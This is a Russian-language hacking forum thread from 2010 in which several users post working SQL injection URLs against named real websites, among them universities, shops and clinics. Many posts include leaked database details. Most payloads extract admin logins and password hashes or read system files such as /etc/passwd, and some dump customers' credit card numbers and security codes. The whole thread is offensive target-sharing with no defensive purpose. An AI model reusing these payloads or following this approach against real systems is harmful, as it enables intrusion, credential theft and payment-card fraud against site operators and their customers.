Просмотр полной версии : SQL Инъекции
MastaBass1
03.12.2010, 19:11
http://www.ruit.ru/?Page=news&nID=25+and+1=0+union+select+1,2,3,concat_ws(0x3a,d atabase(),version(),user()),5
ruitru83_xmb1:4.1.25-log:ruitru83_xmb1@localhost
http://www.rentacrate.com/press.php?id=-6+union+select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3,4,5
4.1.22-standard:rentacrate:rentacrate@lsh1006.lsh.sitepro tect.com
bloodAngel
03.12.2010, 20:31
blind
Code:
http://stomat-clinic.ru/php/content.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19--
Тиц 350
Code:
http://stomat-clinic.ru/php/content.php?id=1+and%20substring%28version%28%29,1 ,1%29=5
5 версія
Code:
http://www.windsurf-seliger.ru/newsone.php?id=105-999.9+union+select+1,2,concat%280x3a,version%28%29 ,0x3a,database%28%29,0x3a,user%28%29%29,4,5,6--
5.0.51-log:2007941_1:b2007941_1@localhost тиц 40
Code:
http://www.diplomna.com/moreinfo.php?diplomID=7333666%27+UNION+SELECT+1,2, 3,4,5,group_concat%28table_name%29,7,8,9,10,11,con cat_ws%280x3a3a,version%28%29,database%28%29,user% 28%29,@@version_compile_os%29+from+information_sch ema.tables+--+
тИЦ: 30
Code:
http://elib.tolgas.ru/catalog/view.php?id=-7333666%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12 ,unhex%28hex%28group_concat%28concat_ws%280x3a3a,i d,user,pass%20%29%29%29%29,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55,56,57,58,59,60,61+from+userlist+--+
ТИЦ: 325
PR: 4
http://eastwestopticians.com/?page=show_ma_products.php&m_id=-5+/*!union*/+select+1,concat%28version%28%29,0x3a,database%28% 29%29,3+--+
5.0.91-community:eastwest_db1
_http://www.nmr.mgh.harvard.edu/martinos/people/showPerson.php?people_id=83+or+1+group+by+concat(( select+version()+from+information_schema.tables+li mit+0,1),floor(rand(0)*2))having+min(0)+or+1--
http://library.umd.umich.edu/research/cat.php?cat=Reference+and+1=0+union+select+concat_ ws(0x3a,user_name,user_password),2,3,4,5,6+from+DE V_mediawiki.ts_user+--+
http://www.procurement.ltd.uk/press.php?id=-14+UNION+SELECT+1,concat_ws%280x3a,version%28%29,d atabase%28%29,user%28%29%29,3,4,5--%20+
Database Version: 4.0.30-log
Database name: u10123203
User name: u10123203@lon1-webmysql-2.msh.demon.net
спалю еще один гарвард
_http://librarylab.law.harvard.edu/shelflife/author/OHagan'+or+(1,1)=(select+count(0),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,floor(rand(0)*2))from(information_schema.tables)+ group+by+2)--+
http://www.sharonmccormickdesign.com/press.php?id=30%27+UNION+SELECT+1,concat_ws%280x3a ,version%28%29,database%28%29,user%28%29%29,3,4--%20+
4.1.20:sharonmccormickdesign_com_-_sitecontent:sharonmccormick@localhost
http://imagine-dev.kent[antigoogle].edu/media/content/press.asp?id=712 union select 1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17 from users
ТИЦ 275 PR 7
http://www.culturalcapital.us/press.php?id=-8+UNION+SELECT+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12, 13--+
5.0.45:USCC:xtuscc@localhost
http://www.wdminc.com/products/productdetails.php?prodID=-605+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9--
4.1.22:wdminc@localhost:wdminc
доступа в information_schema нет
http://www.zenunderwater.com/products.php?prodID=5+and+1=0+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11--
4.1.22-standard:zenunder_zen@localhost:zenunder_zen
http://www.asiabs.com/document/doc_info.php?_id=-25+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,6,7,8,9,10--
http://www.asiabs.com/document/doc_info.php?_id=-25+union+select+concat_ws(0x3a,user_name,password) ,2,3,4,5,6,7,8,9,10+from+user_permission+limit+1,1-- (пароли)
5.1.48-msl-usrs-sure1-log:everyone@s215.sureserver.com.sureserver.com:as iabs_M_and_A
http://www.vaargroephoofddorp.nl/index.php?newsgroup=29+and+1=0+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4,5,6,7, 8,9,10,11,12,13--
5.0.77:vaargroe@localhost:vaargroe
http://www.wareonline.co.uk/drillhall/default.asp?pid=-36+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8+from+hertsweb_joomla.wcow_ users--
http://www.wareonline.co.uk/drillhall/default.asp?pid=-36+union+select+1,2,3,concat_ws(0x3a,username,pass word),5,6,7,8+from+hertsweb_joomla.wcow_users-- (пароли)
5.0.51b-community-nt-log:hertsweb@81.27.104.42:hertsweb_main
http://www.sourcecodesworld.com/source/show.asp?ScriptID=-1032+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13--
4.0.30-max-log:vyom_source@208.109.138.203:vyom_source
http://www.covast.com/news/press.asp?id=-95+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11--
http://www.covast.com/news/press.asp?id=-95+union+select+1,2,3,concat_ws(0x3a,userid,passwo rd),5,6,7,8,9,10,11+from+users-- (пароли)
5.0.91-community:a0195032_@localhost:a0195032_
http://www.igps.net/about/press.php?id=-42+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8--
5.0.51a-24+lenny4-log:Igpsweb1db@LH7800.intermedia.nethpdig
http://www.mysweetbio.es/esp/marche_descr.asp?id=27+or+1=(select+db_name())--
beautysql - бд
http://www.nitevibe.com/gallery2/gal_descr.asp?gallery_id=18+or+1=@@version--
Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) - версия
http://www.nowccc.com/detail.asp?car_cd=5017+or+1=@@version--
Пара средних сайтов
PR 4, тыц 60
http://www.pcid*t*b*se.com/vendor_det*ils.php?id=-240+UNION+SELECT+1,2,3,user(),version(),d*t*b*se() ,7,8,9Звездочку заменить на a.
К сожалению, в базе ниче интересного не нашел.
Вот еще один сайт, мы его ковыряли но тоже ниче не нашли:
PR 5, тыц 30
f cm.d k/index.php?mode=spillerinfo&ID=6%27&holdID=3&spillerID=-54%27+UNION+SELECT+1,2,3,4,5,user(),version(),d*t* b*se(),9,t*ble_n*me,11,12,13,14+FROM+inform*tion_s chem*.t*bles+LIMIT+1,1+--+Если вдруг таки получится- стучите в ПМ.
В продолжении постам Konqi:
http://mitchison.med.[antigoogle]harvard.edu/people/peopleinfo.html?ID=-4 union select 1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,1,2,3,4--
http://www.ticostorecr.com/ver_categoria.php?id=3+and+1=-0+union+select+concat_ws(0x3a,passwd)+from+users--
JohnnyBGoode
06.12.2010, 23:51
http://www.amatue21.com/index.php?do=photo&albom=7+or+1+group+by+concat((select+concat(versio n(),0x3a,user(),0x3a)),floor(rand(0)*2))+having+av g(0)+--+
5.0.91-community-log:amatue21_com@localhost
http://www.supplementalhealthcare.com/press.php?id=3%27+UNION+SELECT+1,2,unhex%28hex%28c oncat_ws%280x3a,version%28%29,database%28%29,user% 28%29%29%29%29,4,5,6,7+LIMIT+1,1--%20+
4.1.11-Debian_4sarge8-log:supp78:shcsupport@tuna10.xmission.com
[AvareC]
07.12.2010, 04:26
по просьбе хозяина сайта уделено
http://www.laterna.net/laterna/press.php?ID=-pollanenm%27+UNION+SELECT+1,2,3,concat_ws%280x3a,v ersion%28%29,database%28%29,user%28%29%29,5,6,7,8, 9,10,11,12,13--+
4.1.22-standard-log:laterna:laterna@10.1.0.8
http://www.eksigent.com/hplc/news/press.php?id=15+UNION+SELECT+concat_ws%280x3a,vers ion%28%29,database%28%29,user%28%29%29,2,3,4--
5.1.41-3ubuntu12:ekDB:ekUser@10.179.43.192
*uNkN0Wn*
07.12.2010, 18:01
http://avcboostwerx.com/index.php?cid=-1+union+select+1,2,concat(username,0x3,password),4 ,5,6,7+from+avcboost_furniture.admin_user+--+
avcboost_valant@localhost�
5.1.47-community-log
http://maxconsole.net/trainers/index.php?cid=-1+union+select+group_concat(username,0x3,password) ,2,3,4,5,6,7,8,9,10,11,12,13+from+maxconforum.user--
maxwww@localhost�
5.1.52-log
http://www.programmershelp.co.uk/showcode.php?e=575+union+select+1,2,current_user,4 ,5,6
http://www.oltamar.ru/press.php?id=-7%27+UNION+SELECT+1,concat_ws%280x3a,version%28%29 ,database%28%29,user%28%29%29,3,4,5,6--%20+
5.0.77:u5170ltamar.ru@localhost
winstrool
08.12.2010, 00:03
_http://www.trabajos.bz/verempresa.php?idemp=-625+union+select+1,2,concat_ws(0x3a,admin_user,adm in_pass),4,5,6+from+admin--
bloodAngel
08.12.2010, 16:40
Code:
http://www.hsx.com/forum/forum.php?id=1+and+substring%28@@version,1,1%29=5
5 верс
Code:
http://bioethics.net/resources/index.php?sid=494263798&id=-1533+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ve rsion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18%20from%20user--&t=rate&toprate=1.9999&tophits=19289
Username: dbo97930092@74.208.16.75
Version: 4.0.27-max-log
Database: db97930092
Google PR: 7
Code:
http://www.awesometheory.com/tutorial.php?id=1+and+1=9+union(select+1,2,3,4,ver sion())
ualberta.ca
Тиц - 950
PR - 8
http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14--
5.0.88-log:web@localhost:department
http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,table_name,ta ble_schema),5,6,7,8,9,10,11,12,13,14+from+informat ion_schema.tables--
http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user,password ,file_priv),5,6,7,8,9,10,11,12,13,14+from+mysql.us er-- (Юзверы майскула)
http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user_login,us er_pass),5,6,7,8,9,10,11,12,13,14+from+westbury.wp _users-- (Юзверы вордпресса)
Также есть еще пхпбб и менее известные движки,искать на поддоменах,их много!
http://www.rociojuradofanclub.com/discografia/album.php?musica=1&album=-3/*!union+select!*/1,2,3,4,5,6,7,8,9,version(),11,12,13
oitbrasil.org.br
PR 7
http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4--
http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+1,concat_ws(0x3a,user,host,passw ord,file_priv),3,4+from+mysql.user+--+ (mysql юзверы)
http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f6574632f7061737377 64),2,3,4+from+mysql.user (etc/passwd)
http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f7573722f6c6f63616c 2f617061636865322f6c6f67732f6572726f725f6c6f67),2, 3,4+from+mysql.user (error_log)
http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f6574632f6d792e636e 66),2,3,4+from+mysql.user (etc/my.cnf)
http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f7573722f6c6f63616c 2f617061636865322f636f6e662f68747470642e636f6e66), 2,3,4+from+mysql.user (httpd.conf)
Cennarios
09.12.2010, 02:55
Агенцтво брачное
http://www.bride4you.by/anketa.php?anketa_id=2'+and+1=0+union+select+1,2,v ersion(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38--+
aciprensa.com
PR - 7
http://www.aciprensa.com/Cine/pelicula.php?id=-165+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8--
5.0.84:aciprensa@localhost:aciprensa
http://www.aciprensa.com/Cine/pelicula.php?id=-165+union+select+1,concat_ws(0x3a,usr_user,usr_pas sword),3,4,5,6,7,8+from+usuario+limit+0,1-- (Пароли)
multimagen.com
PR 5
http://www.multimagen.com/videos/cine.php?id=-127+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9--
5.0.91-community:multimag_multi@localhost:multimag_multim agen
http://www.multimagen.com/videos/cine.php?id=-127+union+select+1,2,concat_ws(0x3a,usuario,clave) ,4,5,6,7,8,9+from+sis_usuarios_administrador+limit +0,1-- (пароли)
cinefantastico.com
PR - 5
http://www.karmafilms.es/ficha_cine.php?ID=-15+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,version(),user(),database()),12,13,14,15,16,17,1 8,19--
5.0.51a-log:karmafilms@localhost:34381wp2009111
http://www.karmafilms.es/ficha_cine.php?ID=-15+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,user_login,user_pass),12,13,14,15,16,17,18,19+fr om+wp_users-- (пароли вордпресса)
http://www.spaghetticlubs.org/review.php?review_id=6211-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,ve rsion(),user(),database()),9,10,11--
5.0.91-community-log:spaghett_web@localhost:spaghett_bookclub
PR 5
http://www.avoarchive.com/display.php?id=1216-999.9+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8--
ignhill_2_w@209.68.4.84:5.0.91-log:ignhill_maradv
PR 3
Freeware Files - Free Software Downloads
Code:
http://www.freewarefiles.com/screenshot.php?programid=-17839+UNION+SELECT+1,2,3,4,concat_ws%280x3a,user%2 8%29,version%28%29,database%28%29%29,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8--
Username: fwfiles4_freewar@localhost
Version: 4.1.22-standard-log
Database: fwfiles4_freeware
Google PR: 5
http://www.marketindia.com/show_item_details.asp?item_id=125+or+1=(select+top +1+quotename(cc_auth_code%2B':'%2Bcc_auth_date)+fr om+orders)+--+
http://www.brokensilence.biz/php.php?u=539+and+1=0+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,v ersion(),43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57--+
rocketry.org
PR 4
http://www.rocketry.org/news/newsStory.php?newsID=-10+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11+--+
http://
www.mosteatr.ru
/index.php?nav=profile&sid=239+union+select+1,group_concat%28table_name%2 9,3,4+from+information_schema.tables--
ТиЦ 60 PR 3
Я.Каталог: Билеты в театры, на концерты
Немного от меня.
Code:
http://magpol.ru/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,ve rsion%28%29,4
5.0.26-log
Code:
http://www.baikonure.ru/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,ve rsion%28%29,4
5.0.91-community
Code:
http://www.itsfclan.it/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,ve rsion%28%29,4
Code:
http://pub-tower.ru/e107_plugins/roll_mini/roll.php?cat=1%27%20and%200%20union%20select%201,2 ,concat_ws%20%28%22%27%22,user_loginname,user_pass word%29,4,5,6%20from%20e107_user%20limit%200,1--%20&card_id=109
Code:
http://sempervivum-liste.de/e107_plugins/roll_mini/roll.php?cat=1%27%20and%200%20union%20select%201,2 ,concat_ws%28%22%27%22,user_loginname,user_passwor d%29,4,5,6%20from%20e107_user%20limit%200,1--%20&card_id=109
Code:
http://www.aacgc.com/SSGC/e107_plugins/aacgc_pnews/News.php?1.2%20and%200%20union%20select%201,concat _ws%280x3a,user_loginname,user_password%29,3%20fro m%20e107_user%20limit%200,1
http://www.bakertillynepal.com/newslist.php?id=-4+union+select+1,concat_ws(0x3a,user_id,login_name ,login_pwd,user_email),3,4,5,6,7,8,9,10,11,12+from +btn_user+--
http://soku-au.com/newslist.php?id=-4+union+select+1,2,3,group_concat(0x0b,id,0x3a,use rname,0x3a,userpwd),5,6,7,8,9+from+admin+--
http://snow-country.jp/contents.php?id=-142+union+select+1,concat_ws(0x3a,username,passwor d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22+from+c_admin_user+--+
http://fan.nikko-aizu.com/contents.php?id=-94+union+select+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+f rom+c_admin_user--
http://www.super55.com/lab.php?id=1562+UNION+SELECT+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,9 4,95,96,97,98,99,100,101,102,103,104,105,106,107,1 08,109,110,111,112,113,114,115,116,concat_ws%280x3 a,version%28%29,database%28%29,user%28%29%29,118,1 19,120,121,122,123,124,125,126+LIMIT+1,1--%20&lang=slov&word=%20%20neutrofily
5.1.48-msl-usrs-sure1-log:super55_szotar:super55@localhost
http://redbox.sg/products.php?cat_id=-61+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18+from+user--
bdlik_bdlik@localhost:5.0.91-community:bdlik_redboxx
S$7.00
http://www.the8unit.com.my/news.php?id=5-999.9+union+select+1,2,concat_ws(0x3a,username,pas sword),4,5,6,7,8,9+from+user--
Cennarios
11.12.2010, 16:32
MSSQL
http://www.ifocus.us/default.asp?pageid=7&deptid=7+or+1=(select+db_name())--
DB: aware_ifocus-consulting
tables: Content, ContentStatus
http://proroad.net/produit.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--
http://proroad.net/produit.php?id=-6+union+select+1,2,3,concat_ws(0x3a,user,pass),5,6 +from+tbl_admin--
Online Shop cc
http://www.shakuhachi.net.au/product_detail.php?id=id=-99+/*!UnIoN+SeLeCt*/+1,2,3,cOnCaT%28cust_fname,0x3a,cust_lname,0x3a,cu st_email,0x3a,cust_address,0x3a,cust_country,0x3a, cookie_code,0x3a,order_status,0x3a,order_date,0x3a ,city,0x3a,state,0x3a,poscode,0x3a,phone,0x3a,mobi le,0x3a,card_name,0x3a,card_number,0x3a,credit_exp ,0x3a,card_security%29,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18+from+m_order%20where%20credit_exp!=0 limit 213,812--
nemaniak
13.12.2010, 00:19
www.sgsits.ac.in PR-5
Code:
http://www.sgsits.ac.in/pages/facultdetail.php?fid=58%27+union+select+1,2,3,4,un hex%28hex%28concat_ws%280x3a,version%28%29,user%28 %29,database%28%29%29%29%29,6,7,8,9,0,11,12,13,14, 15,16,17,18,19,20,21,22,23,24+--+
Code:
4.1.7:root@web2.sgsits.ac.in:sgsits
www.romislokus.com ТИЦ-130
blind
Code:
http://www.romislokus.com/eng/radios.php?num=102+and+substring%28%28select+versi on%28%29%29,1,1%29=5
Code:
5.0.77-log:romislokus@10.10.0.1:romislokus
familyrapp.com
PR 4
http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=@@version (2000 ветка,поддержки xml raw нету)
http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=(select+top+1+username+from+login+where+use rname+not+in+(select+top+0+username+from+login)) (юзвери)
http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=(select+top+1+password+from+login+where+pas sword+not+in+(select+top+0+password+from+login)) (пароли)
winstrool
13.12.2010, 18:51
_http://fmv.bz/jp/item.php?i=-24+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(),database()),10,11,12--
5.0.51a-log:sd_dba_LTkzODky@cgi07.unix:sddb0025016300
indusites.com
http://indusites.com/press/press-release-details.asp?id=141+or+1=@@version (2005 ветка )
http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+(select+top+9+table_name+from+information_sche ma.tables)) (нужная нам таблица)
http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+column_name+ from+information_schema.columns+where+table_name=' tblAdmin'+and+column_name+not+in+(select+top+0+col umn_name+from+information_schema.columns+where+tab le_name='tblAdmin'+group+by+column_name)+group+by+ column_name+for+xml+raw) (перебираем колонки)
http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+quotename(username %2B':'%2Buserpassword)+from+tblAdmin) (логин и пароль админа )
http://indusites.com/admin/ (сама админка)
http://ichep04.ihep.ac.cn/db/abs_cont1.php?session_no=3&id=-548+union+select+1,unhex(hex(concat_ws(0x3a,user,p assword))),3,4,5,6,load_file('/etc/passwd'),8,9,0,11,12,13,14,15,16,17,18,19+from+mys ql.user--
HTML:
http://www.kimallansilk.com/productdetail.php?proid=-1+union+select+1,2,aes_decrypt(aes_encrypt(group_c oncat(table_name),1),1),4,5,6,7,8,9,10,11+from+inf ormation_schema.tables+limit+0,1--
HTML:
http://www.forest-products.co.uk/products.php?id=-181+UnIon+selECt+1,2,3,aes_decrypt(aes_encrypt(gro up_concat(table_name),1),1),5,6,7,8,9,10+from+info rmation_schema.tables+limit+0,1--
http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,con cat_ws(0x3a,user,password,host,file_priv),4,5,6,7, 8+from+mysql.user
http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,loa d_file(0x2f6574632f706173737764),4,5,6,7,8
HTML:
http://www.boredatuni.com/stuff.php?stuffId=-73+union+select+1,aes_decrypt(aes_encrypt(group_co ncat(table_name),1),1),3+from+information_schema.t ables+limit+0,1--
HTML:
http://www.toonecards.com/view-free-stuff.php?id=-20+UnIon+selECt+1,2,3,4,5,6,user(),8,9,10,11,12,13 ,14,15,16,17,18,19,20+--+
HTML:
http://www.sandwichbau.de/newsview.php?newsid=-118+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encrypt (group_concat(table_name),1),1),7,8,9,10,11+from+i nformation_schema.tables+limit+0,1--
HTML:
http://www.antoniandalison.co.uk/shop.php?category=-4+union+select+1,aes_decrypt(aes_encrypt(group_con cat(table_name),1),1)+from+information_schema.tabl es+limit+0,1--
HTML:
http://www.griefencounter.org.uk/shop.php?ShopID=-5+union+select+1,version(),3,4--+
HTML:
http://www.skye.co.uk/local-media-shop.php?catid=-14+union+select+1,2,aes_decrypt(aes_encrypt(group_ concat(table_name),1),1),4,5,6+from+information_sc hema.tables+limit+0,1--
HTML:
http://www.brokenpencil.com/view.php?id=-5392+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encryp t(group_concat(table_name),1),1),7,8,9,10,11,12+fr om+information_schema.tables+limit+0,1--
HTML:
http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,concat_ws(0x3a,FirstName,La stName,ShippingAddress,Country,City,State,Zip,Emai l,Phone,CreditCardType,CreditCardNumber,CreditCard Name,CreditCardExpiryDate,CreditCardPinNumber),6,7 ,8+from+shop_orders--
http://www.alcobex.com/newsview.php?newsid=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10-- (вывод в титле)
http://www.sandwichbau.de/newsview.php?newsid=-85+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11--
http://snow-country.jp/festival/contents.php?id=-10+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4--
http://www.job-passport.com/en/activity_detail.php?actid=-21%20union%20select%201,2,3,4,version(),6,7,8,9,10 ,11,12 --
не нашёл админку
ver:5.0.77
datadir:/var/lib/mysql/
base:jobpass_test
tmpdir:/tmp/
user:jobpass@localhost
os:redhat-linux-gnu
basedir:/usr/
http://www.povareschka.ru/prod.php?id=4+union+select+1,table_name,3,4,5,6,7, 8+from+information_schema.tables+--&sort=9
tables: administrator, user
---------------------------------------------------
http://www.ucamind.com/prod.php?id=4+union+select+1,group_concat(0x0b,id, 0x3a,username,0x3a,password),3,4,5,6,7,8+from+admi nlogin+--
http://www.maind.com/catalog/add2cart.asp?id=-26+union+select+1,2,3,4,5,concat_ws(0x3a,database( ),user(),version()),7,8,9,10,11,12,13,14,15,16,17
http://www.maind.com/catalog/add2cart.asp?id=-26+union+select+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17+from+admin
http://www.npomagr.ru/prod.php?id=4+union+select+1,2,3,concat_ws(0x3a,ID ,Name,Password),5,6+from+_magr_users--
http://www.breedjewelry.com/view_detail.asp?id=395+or+1=@@version--
http://www.breedjewelry.com/view_detail.asp?id=395+or+1=(select+top+1+quotenam e(userid%2B':'%2Bpassword)+from+admin)--
HTML:
http://www.walkerbooks.com/books/catalog.php?key=-883+UnIon+selECt+1,2,aes_decrypt(aes_encrypt(group _concat(table_name),1),1),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25+from+informati on_schema.tables+limit+0,1--
HTML:
http://museummasterworks.com/Catalog.php?page=-3+UnIon+selECt+1,aes_decrypt(aes_encrypt(group_con cat(table_name),1),1),3,4+from+information_schema. tables+limit+0,1--
HTML:
http://www.southiceland.com/main.php?cat=-2+UnIon+selECt+1,2,aes_decrypt(aes_encrypt(group_c oncat(table_name),1),1),4,5,6,7,8,9+from+informati on_schema.tables+limit+0,1--
christianactivities.com
PR 5
http://www.christianactivities.com/artistupdates/story.asp?ID=-4308+union+select+concat_ws(0x3a,user(),version(), database()),2,3,4,5,6,7,8,9,10,11,12--
http://www.soupbase.com/view.asp?cid=2706+or+1=@@version
http://wecsa.co.za/squadupdates.asp?id=1+or+1=@@version
http://www.thesame-innovation.com/Thesame/Prod/Prod.php?Id=-4+union+select+1,group_concat(0x0b,Id_Admin,0x3a,T itre_Admin,0x3a,Pass_Admin),3,4,5+from+Admin+--
gmvnl.com
PR - 6
http://www.gmvnl.com/newgmvn/updates/updates.asp?id=12+or+1=(select+system_user)--
http://www.mrtoys-games.com.au/Store_details.asp?ID=6+or+1=@@version
http://sosintim.ru/search.php?search=asd%27+and+1=0+union+select+1,2, 3,4,5,version%28%29,7+--+
http://support.optis-world.com/press_release_details.asp?Product_id=12281+or+1=@@ version
http://www.hirestrategy.com/articles/feature_content.asp?ID=56+or+1=@@version
http://www.mrsfixit.com/fixits/FixitCategoryList.asp?id=69+or+1=@@version
http://www.che-esche.ru/posts.php?id=-100+union+select+1,2,3,4,group_concat(TABLE_NAME), 6,7,8,9+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,10+--+
таблица users_tbl
/////printthread.php?t=21336&page=293&pp=40
http://www.che-esche.ru тоже самое что и http://www.che-esche.com
moodoone
18.12.2010, 20:07
Code:
http://www.radioera.com.ua/aboutprog/?idArticle=-12+union+select+1,2,3,version%28%29,5,6,7,8,9,10--
ТИЦ: 450
Вывод в title
http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,7,8,9,10,11
http://www.travelsecrets.com/traveldeals.html?category=Ho%27+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24+--+
5.0.51a-24+lenny4-log
доступна mysql.users
Но пасс хэша рутового подобрать не вышло.
Hack_ERR++
19.12.2010, 07:23
Code:
http://www.diario3.com.ar/nota.php?id=-1433+union+select+1,2,concat_ws(0x20,us_id,us_user ,us_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+f rom+usuario--
satana-fu
19.12.2010, 07:40
http://www.1soveti.ru/page.php?link=-44+union+select+1,group_concat(login,char(58),pass ),3,4,5,6,7,8+from+user--
Порник, открыта mysql.user
Code:
http://www.mondolapdance.it/provincia.php?sP=PD%27+or+1=1+union+select+1,2,3,g roup_concat%28TABLE_SCHEMA,%27.%27,TABLE_name%29,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+inform ation_schema.TABLES+where+table_name+like+%27%user %%27+--+
аналогично
Code:
http://www.annuaire.fille-exhibe.com/Youpornotube-info-1061+union+select+1,2,3,4,5,6,7,8,9,group_concat%2 8distinct%20table_name%20order%20by%20table_name%2 0desc%29,11,12,13,14,15,16,17,18,19,20,21,22+from+ information_schema.tables+--+.php
moodoone
19.12.2010, 22:34
Code:
http://www.dovidkalutsk.com.ua/news_view.php?id=-739+union+select+1,2,3,4,5,6,7,version%28%29,9,10, 11,12+from+userlist--
http://www.vard.si/slo/kontinent.php?id=4;select+version()::int,null,null ,null,null,null,null,null,null,null,null,null+from +pg_user--
http://www.blbg.org.sg/event_detail.php?id=96+union+select+1,2,3,4,5,6,co ncat_ws(0x3a,username,version()),8,9,10,11,12,13,1 4,15,16,17,18,19,20+from+users--
life_glider
21.12.2010, 03:59
view-source:http://www.worldwalk.info/en/catalog/1135%20and%202=1%20union%20select%201000,version%2 8%29,3000,4000,5000,6000,7000,8000,9000,10000,1100 0,12000#/
Code:
http://plugring.farmanager.com/category.php?cid=33+and+1=2+union+select+1,2,3,con cat(version(),0x3a,database()),5,6+--+&l=ru
5.0.77 : plugring
ТИЦ 10
PR 3
Code:
http://www.printeffect.ru/product.php?tp=1+and+2=0+union%20select%20concat_w s%280x3a,email,password%29+from+users
